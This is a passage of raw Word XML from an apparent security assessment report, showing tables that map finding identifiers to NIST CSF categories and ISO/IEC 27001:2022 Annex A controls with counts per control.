            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PR.AA Protect - Identity Management, Authentication, and Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-09, CF-10, CI-03, CI-13, DEP-02, PB1-03, PB1-06, PB1-18, PB2-07, PB2-09, PB2-10, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PR.DS Protect - Data Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, CF-11, CF-12, CI-03, DEP-03, DET-02, PB2-08, PB2-11, SEC-03, SEC-04, SEC-05, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PR.PS Protect - Platform Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-03, APP-04, APP-05, APP-06, APP-07, APP-09, APP-10, APP-12, APP-13, APP-14, CF-01, CF-02, CF-04, CF-05, CF-06, CF-07, CF-08, CF-13, CF-14, CF-15, CF-18, CI-01, CI-02, CI-05, CI-08, CI-09, CI-10, CI-15, DEP-01, DEP-02, DEP-04, DEP-05, DEP-08, DEP-10, DET-05, DET-12, DET-16, PB1-01, PB1-02, PB1-03, PB1-04, PB1-05, PB1-07, PB1-10, PB1-11, PB1-12, PB1-13, PB1-14, PB1-15, PB1-16, PB2-01, PB2-02, PB2-03, PB2-04, PB2-05, PB2-06, PB2-13, PB2-14, PB2-15, PB2-16, PB2-17, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DE.CM Detect - Continuous Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, APP-08, CI-01, DET-02, DET-03, DET-04, DET-06, DET-07, DET-08, DET-09, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DE.AE Detect - Adverse Event Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-16, DET-03, DET-04, PB1-08, PB1-09, PB1-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RS.MI Respond - Incident Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03, PB2-09, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.6 ISO/IEC 27001:2022 Annex A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Findings are mapped to ISO/IEC 27001:2022 Annex A controls.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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4036"/>
        <w:gridCol w:w="4036"/>
        <w:gridCol w:w="568"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Annex A control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.15 Access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03, PB1-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.17 Authentication information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-02, PB1-06, SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.21 Managing information security in the ICT supply chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-03, DEP-04, DEP-05, DEP-06, DEP-07, DEP-09, DEP-10, DEP-12, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.2 Privileged access rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CI-13, DET-04, PB1-03, PB2-09, PB2-10, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.3 Information access restriction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-09, CF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.6 Capacity management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.8 Management of technical vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06, DEP-01, DEP-02, DEP-04, DEP-08, DEP-09, DEP-12, PB2-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.9 Configuration management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, APP-05, APP-08, APP-09, APP-12, DEP-03, DET-07, DET-18, PB2-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.12 Data leakage prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11, CI-03, PB2-08, SEC-03, SEC-05, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.15 Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12, CI-03, CI-09, DET-03, DET-04, PB1-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.16 Monitoring activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03, DET-04, DET-06, DET-07, DET-08, DET-09, PB1-08, PB1-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.19 Installation of software on operational systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-08, DEP-01, DEP-02, DEP-03, DEP-04, DEP-05, DEP-06, DEP-08, DEP-10, DET-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.24 Use of cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, DET-13, PB2-07, PB2-11, SEC-03, SEC-04, SEC-05, SEC-09, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.25 Secure development life cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-14, CI-02, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.26 Application security requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.28 Secure coding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
